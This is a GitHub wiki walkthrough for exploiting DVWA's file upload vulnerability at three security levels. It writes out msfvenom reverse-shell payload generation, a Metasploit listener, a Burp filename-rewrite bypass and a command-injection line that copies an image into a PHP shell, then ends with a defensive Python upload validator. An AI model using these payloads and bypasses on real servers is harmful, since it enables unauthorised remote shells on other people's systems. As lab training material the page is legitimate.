File upload in dvm - singirikondamani/Noted GitHub Wiki

Here’s a simplified step-by-step guide to exploit a file upload vulnerability at different security levels using Metasploit:

Steps for Low Security Level:

  1. Generate Payload:

    • Open a terminal on Parrot Security.
    • Type: sudo su (password: toor).
    • Navigate to root: cd.
    • Generate a PHP payload:
      msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.1.13 LPORT=4444 -f raw
    • Copy the generated payload.
  2. Create PHP File:

    • Navigate to Desktop: cd /home/attacker/Desktop/.
    • Open the editor: pluma upload.php.
    • Paste the payload and save the file as upload.php.
  3. Upload Payload:

    • Open Firefox, go to: http://10.10.1.22:8080/dvwa/login.php.
    • Login with Username: admin, Password: password.
    • Change DVWA security level to Low.
    • Go to File Upload.
    • Upload upload.php.
  4. Set Up Metasploit Listener:

    • In terminal, launch Metasploit: msfconsole.
    • Set up the listener:
      use exploit/multi/handler
      set payload php/meterpreter/reverse_tcp
      set LHOST 10.10.1.13
      set LPORT 4444
      run
      
  5. Execute the Payload:

    • Open Firefox, go to:
      http://10.10.1.22:8080/dvwa/hackable/uploads/upload.php.
    • The Meterpreter session starts.
  6. Confirm Access:

    • In Meterpreter, type: sysinfo to view the victim’s system information.

Steps for Medium Security Level:

  1. Generate Payload:

    • Follow steps 1-2 from the Low Security Level, but save the file as medium.php.jpg.
  2. Upload with Burp Suite:

    • Change DVWA security level to Medium.
    • Set up Burp Suite proxy to intercept requests (proxy: 127.0.0.1, port 8080).
    • Go to File Upload, upload medium.php.jpg.
    • In Burp Suite, intercept and change filename from medium.php.jpg to medium.php.
    • Forward the request.
  3. Set Up Listener:

    • Follow step 4 from Low Security Level.
  4. Execute Payload:

    • Open Firefox, go to:
      http://10.10.1.22:8080/dvwa/hackable/uploads/medium.php.
    • Meterpreter session starts.
  5. Confirm Access:

    • In Meterpreter, type: sysinfo.

Steps for High Security Level:

  1. Generate Payload:

    • Follow steps 1-2 from the Low Security Level, but save the file as high.jpeg.
    • Add GIF98 to the first line of the payload.
  2. Upload & Bypass:

    • Change DVWA security level to High.
    • Upload high.jpeg.
    • Use Command Injection to copy the file:
      |copy C:\wamp64\www\DVWA\hackable\uploads\high.jpeg C:\wamp64\www\DVWA\hackable\uploads\shell.php
      
  3. Set Up Listener:

    • Follow step 4 from Low Security Level, but with LPORT=2222.
  4. Execute Payload:

    • Open Firefox, go to:
      http://10.10.1.22:8080/dvwa/hackable/uploads/shell.php.
    • Meterpreter session starts.
  5. Confirm Access:

    • In Meterpreter, type: sysinfo.

This concludes the steps for exploiting a file upload vulnerability at different security levels in DVWA using Metasploit.
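
Seen from the defender's side, each upload above is stopped by server-side checks on the final filename and the received bytes. The following Python validator is an added example, not part of the original wiki or DVWA's code; validate_upload, the allowlist and the sample files (constructed placeholders, not real payloads) are assumptions.

```python
import os
import secrets

# Accepted image types and their magic-byte signatures (assumed allowlist).
SIGNATURES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
SCRIPT_EXTS = {"php", "php5", "phtml", "phar"}
SCRIPT_MARKERS = (b"<?php", b"<?=")


def validate_upload(filename, data):
    """Return (accepted, reason, stored_name) for one uploaded file.

    Only the final filename in the request and the received bytes are
    trusted; the client-supplied Content-Type header is ignored.
    """
    base = os.path.basename(filename.replace("\\", "/")).lower()
    parts = base.split(".")
    ext = "." + parts[-1] if len(parts) > 1 else ""
    if ext not in SIGNATURES:
        return False, "extension not allowlisted", None
    # Names such as x.php.jpg: check every inner dot-separated segment.
    if any(p in SCRIPT_EXTS for p in parts[1:-1]):
        return False, "script extension inside name", None
    if not data.startswith(SIGNATURES[ext]):
        return False, "magic bytes do not match extension", None
    if any(m in data.lower() for m in SCRIPT_MARKERS):
        return False, "embedded script marker", None
    # Server-chosen random name: the uploader never controls the stored path.
    return True, "ok", secrets.token_hex(16) + ext


# Constructed stand-ins for the files named in the steps above.
PHP_BODY = b"<?php /* constructed placeholder */ ?>"
SAMPLES = {
    "upload.php": PHP_BODY,                  # Low level upload
    "medium.php": PHP_BODY,                  # Medium level, name after rewrite
    "medium.php.jpg": PHP_BODY,              # Medium level, original name
    "high.jpeg": b"GIF98\n" + PHP_BODY,      # High level upload
    "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,  # benign JPEG header
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, validate_upload(name, body)[:2])
```

Validation alone does not cover the High level copy step, which goes through a separate command injection flaw; serving the uploads directory with script execution disabled, or storing uploads outside the web root, keeps a renamed file from running.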